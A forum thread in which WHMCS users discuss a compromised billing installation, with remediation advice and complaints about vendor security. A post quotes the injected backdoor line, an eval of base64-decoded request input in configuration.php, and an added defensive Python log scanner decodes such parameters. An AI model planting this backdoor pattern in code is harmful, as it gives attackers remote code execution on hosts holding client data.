
Was my installation compromised?


Morty


Hi,

 

Was wondering if I could get a few opinions of what else I should do to enhance security, as well as any checks I can do to understand the degree to which my installation was potentially compromised.

 

I woke this morning to find email from customer saying my site was down with this error:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/hilexcom/public_html/billing/configuration.php on line 2

 

So I check, and sure enough, can't access client site or WHMCS admin either.

 

Line 2 of my Configuration.php file contained this:

$license = "1';eval(base64_decode($_REQUEST['c']));#";

 

instead of:

$license="Owned-99999999999999999999";

 

I'm back up and running again after replacing line 2 with my correct license.

I've checked the logs, and there doesn't seem to be any admin access other than from my own IP.

Anything else I should check?

 

I will also be upgrading to the latest version of WHMCS. Anything else recommended?

Comments appreciated.


Thanks Shane, good idea, didn't think of that.

Just checked and nothing in the downloads, also I got the following warning:

Permissions Warning!

The downloads folder is not writable by WHMCS so you cannot upload files

 

I'm going to leave it that way....


I would be checking your entire site for rogue scripts. Start with WHMCS - every folder, every file. Use WinMerge to compare the stock release with the files on your server. It will easily show you modified files and new files.

 

Do the same with any other installs you have on your site - wordpress, or whatever you use for your main site etc.


I have a lot invested in WHMCS and would like for things to work out but my team has been discussing not being able to use WHMCS anymore because of the downward trend in the product quality.

 

The recent security vulnerabilities that were discovered were the result of incredibly amateur coding mistakes. 2 vulnerabilities were discovered 2 days apart. It's great that they were patched relatively quickly, but unfortunately the vulnerability was already public and still leaves us vulnerable and gives us a lot of work to have to keep patching.

 

Flaws happen in software but it is getting too frequent and the vulnerabilities are pretty basic issues that 1. shouldn't have been implemented into the code in the first place and 2. should have been audited.

 

Why are there no audits of the WHMCS software and what is being done to prevent this in the future? There's a lot of outrage in the web hosting community and it seems that someone should at least come forward and say what is being done to better the security of WHMCS. All we've gotten so far is patches and really impersonal blog posts from Mat that don't allow comments so no discussion can be had.


Your WHMCS installation was exploited. A simple understanding of what the code in the license variable does is enough to prove this. Patch your WHMCS and edit the $license line to $license = 'yourlicensekey'; You would want to reset all sensitive data in your database (all passwords, remote access hashes, client passwords). Basically you were exploited by vulnerabilities in WHMCS and the code you mentioned is/was being used as a backdoor for further access.


I have a lot invested in WHMCS and would like for things to work out but my team has been discussing not being able to use WHMCS anymore because of the downward trend in the product quality.

 

The recent security vulnerabilities that were discovered were the result of incredibly amateur coding mistakes. 2 vulnerabilities were discovered 2 days apart. It's great that they were patched relatively quickly, but unfortunately the vulnerability was already public and still leaves us vulnerable and gives us a lot of work to have to keep patching.

 

Flaws happen in software but it is getting too frequent and the vulnerabilities are pretty basic issues that 1. shouldn't have been implemented into the code in the first place and 2. should have been audited.

 

Why are there no audits of the WHMCS software and what is being done to prevent this in the future? There's a lot of outrage in the web hosting community and it seems that someone should at least come forward and say what is being done to better the security of WHMCS. All we've gotten so far is patches and really impersonal blog posts from Mat that don't allow comments so no discussion can be had.

 

Hi,

 

I agree 100% with you.


Why are there no audits of the WHMCS software and what is being done to prevent this in the future?

 

This seems to be a very common question since SolusVM's public announcement of having one done. However it seems to never come with the question, "has WHMCS performed an audit in the past, and if so, what was the result of it?". Not every company publicizes if it performs a security audit ever, or on a regular basis.

 

It also seems that there's a standard of assuming there shouldn't be an issue in software, ever. Yes, there were a few exploits identified in a short time frame, however that seems to be the only driving force in this. Not the fact that WHMCS was extremely proactive and got an update out - all three times in the recent months while they weren't even at work (from the reports I've seen).

 

While it's unfortunate, yes these issues were discovered by external sources but it appears people think that's the only way they're discovered. Look at the past 6 month history at how proactive they've been working internally and with external vendors:

 

ex:

http://blog.whmcs.com/security.php?t=73290

"The regression was identified internally and is not a candidate for public disclosure."

 

Let's take a look at Oracle, a billion dollar company and the laundry list of exploits they've had:

http://www.red-database-security.com/exploits/oracle_exploits.html

 

Let's take a look at PayPal, "Showing 1 - 25 of 59":

http://packetstormsecurity.com/search/?q=paypal

 

When WHMCS had two within two days, everyone cried for a security audit (likely without even knowing what happens during a security audit).

When WHMCS went a year without a security issue, everyone griped about something else.

When they do x, everyone says where's the bandwagon?

 

How about a "thanks for providing an extremely inexpensive software for the functionality that allows me to run my business, and getting after these issues so promptly"? It's unfortunate that it occurred, and I hope it improves, but I really appreciate the urgency.


The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

 

I'm not sure what kind of access that exploit gives, but I think if one exploits WHMCS that person can further upload other exploits and/or even some PHP based shells which might be able to edit the config files.

 

Just a guess


The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

If they had FTP/file/SSH access, why would they edit the config file and reveal themselves?

From what I understand about the recently revealed exploits (currently patched), it's not FTP/File/SSH, it's changed through a submitted string through WHMCS that grants elevated access.


I'd recommend looking through your Apache access logs for all page access requests to "configuration.php"; also you may find the value passed to 'c' will be present as a "POST" to this file. This might provide further clues as to what may have been executed as PHP through this file.
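An added example (not code from the thread) of the log check suggested above: it parses Apache combined-format access log lines, reports every request to configuration.php or licenseerror.php and every request carrying a `c` parameter, and base64-decodes that parameter so the analyst can read what was sent. The log lines are constructed (documentation IP addresses, a `c` value that decodes to a harmless echo); note that the default combined format records only the request line, so a value sent in a POST body would need a request-body log (mod_security or similar) rather than access_log.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: client, identd, user, time, request line, status, bytes, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Files the thread singles out; the injected line reads $_REQUEST['c'] from any page that includes it.
WATCH_FILES = ("configuration.php", "licenseerror.php")

# Constructed sample lines; the c value is base64 for: echo 'test';
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2013:03:12:45 +0000] "GET /billing/licenseerror.php?c=ZWNobyAndGVzdCc7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2013:03:12:50 +0000] "POST /billing/configuration.php?c=ZWNobyAndGVzdCc7 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Oct/2013:08:00:01 +0000] "GET /billing/clientarea.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2013:03:13:01 +0000] "GET /billing/configuration.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

def decode_param(value: str):
    """Decode a base64 parameter for reading only; None if it is not clean base64 text."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def scan_log(lines) -> list:
    """Return every request that touches a watched file or carries a c= parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip the line rather than abort the scan
        url = urlsplit(m["target"])
        c_values = parse_qs(url.query).get("c", [])
        if not url.path.endswith(WATCH_FILES) and not c_values:
            continue
        hits.append({
            "ip": m["ip"], "time": m["time"], "method": m["method"],
            "status": m["status"], "path": url.path,
            "decoded_c": [decode_param(v) for v in c_values],
        })
    return hits

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

For a real check, pass `open("/path/to/access_log")` to `scan_log` and pivot on the client IPs it returns across the whole log.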


Hello,

I'm curious if anyone else has been hacked while running 5.2.10. I was yesterday, but the hack started before I upgraded so I'm not sure if it is a hole in 5.2.10 or 5.2.8.

One of the files that were uploaded did happen after the upgrade so I'm thinking 5.2.10 still has a security hole in it. Something is allowing hackers to upload files to the download folder.


the hack started before I upgraded so I'm not sure if it is a hole in 5.2.10 or 5.2.8.

...

One of the files that were uploaded did happen after the upgrade

Is it possible that the files uploaded while you were on the older version and hacked allowed them to upload more? An alternate would be if they had gained an admin password during the first part and you hadn't changed it after.


What's really concerning is the coding practices that led to these exploits. As I understand it, they were really basic things that a beginner programmer should know, and they also recreated a function that was removed from PHP because it was a security threat.


The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

 

Hi othellotech,

 

I had confirmed myself that the current hacks going on with the configuration.php file are in fact done with a specially crafted URL query on the licenseerror.php webpage.

 

Looking at my server log I caught this.

 

All you do is copy and paste that URL string in your WHMCS website and it adds a new license.

 

It can also change your admin password.

 

I fixed my system and then for kicks ran the same query string and it did it again.

But this time it changed my admin password, which at first the hacker did not do.

So you need to change the /admin folder and password protect it :)

The hacker somehow was able to do this without showing up in the WHMCS admin logs, but I did find it in the server logs though.

When I did this it showed up in the admin logs in WHMCS.


I guess it is possible that they had already uploaded files that allowed them to upload more. There was a script called sec.php uploaded right before the update and then sql.php was uploaded after the update. I changed my admin username and password when I did the update so I don't think they had that.

 

Still hoping to hear back from whmcs, so far I've received a canned response about cleaning up after being compromised but nothing about if they know about security flaws in the current version.


Not every company publicizes if it performs a security audit ever, or on a regular basis.

 

It also seems that there's a standard of assuming there shouldn't be an issue in software, ever. Yes, there were a few exploits identified in a short time frame, however that seems to be the only driving force in this. Not the fact that WHMCS was extremely proactive and got an update out - all three times in the recent months while they weren't even at work (from the reports I've seen).

[...]

How about a, thanks for providing an extremely inexpensive software for the functionality that allows me to run my business, and getting after these issues so promptly. It's unfortunate that it occurred, and I hope it improves, but I really appreciate the urgency.

 

I agree, exploits are always going to be found, and what (mostly) matters is the expediency with which they are corrected. Sadly Oracle is an excellent example of how NOT to do patching. Though I say "mostly", because...

 

What's really concerning is the coding practices that led to these exploits. As I understand it, they were really basic things that a beginner programmer should know, and they also recreated a function that was removed from PHP because it was a security threat.

 

BryanB does have a valid point. Some of the biggest companies and strongest software in the world have been hacked/exploited, but when it's the result of a very basic, n00b-type error, that puts a different spin on things.

 

I truly appreciate the prompt response the WHMCS team made in addressing the last couple of security issues, but I'm considering the recent (last couple of years) history, and choices made by WHMCS that have affected security and usability. It could be normal growing pains... or it could be incompetence. Time will tell which.


There is currently a new exploit out publicly for version 5.2.10, so it would be best to take your WHMCS system offline until the WHMCS team comes up with a security patch. According to the exploit publisher, this is only the first part of the exploit and there's more to follow, unless the WHMCS team can figure out what it is and plug the security hole.

